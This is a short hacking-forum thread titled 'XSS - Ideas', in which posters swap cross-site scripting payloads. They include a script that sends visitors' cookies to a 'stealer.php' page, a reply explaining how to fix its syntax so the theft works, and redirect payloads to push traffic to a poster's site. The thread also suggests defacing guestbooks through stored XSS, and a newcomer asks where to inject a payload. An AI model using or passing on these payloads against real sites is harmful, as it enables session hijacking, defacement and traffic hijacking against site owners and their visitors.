Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

XSS - Ideas

  1. Home
  2. Forum
  3. Web hacking
  4. XSS - Ideas

ghost's Avatar

ghost

0 0

XSS - what can we do with it.

markup<script>document.location=stealer.php?c=document.cookie</script>

Anyone got any other ideas, I'll post some CSRF later when I have time


nanoymaster's Avatar

nanoymaster

the master of nanoy(.org)
0 0

A personal fave…

<script>document.location='http://www.nanoy.org';</script> but you could always do a simple alert: <script>alert('pwnt…or_whatever!')</script>

;)


ghost's Avatar

ghost

0 0

mozzer wrote: markup&lt;script&gt;document.location=stealer.php?c=document.cookie&lt;/script&gt;

That wouldn't do what you probably want it to. For one thing, quotation marks (single or double) are required around the target location, which is ended after c=. After the location, since you want to include the user's cookie, you should put an addition sign before it. You should also have brackets around the target location (including document.cookie) instead of an equal sign.

In answer to your question, it is also possible to deface sites that have more severe cross-site scripting vulnerabilities (e.g. many guestbook scripts), more specifically sites that have vulnerable fields that are shown back to users after input is received. Some may refer to that as permanent XSS.


ghost's Avatar

ghost

0 0

markup&lt;script&gt;window.location=&quot;http://www.yoursite.com&quot;&lt;/script&gt;

Easy way to generate traffic to any site you want.


ghost's Avatar

ghost

0 0

Im new to webhacking and Im interested in "<script>window.location="http://www.yoursite.com"</script>" where would I input that? In my pages source or in the browser like other techniques.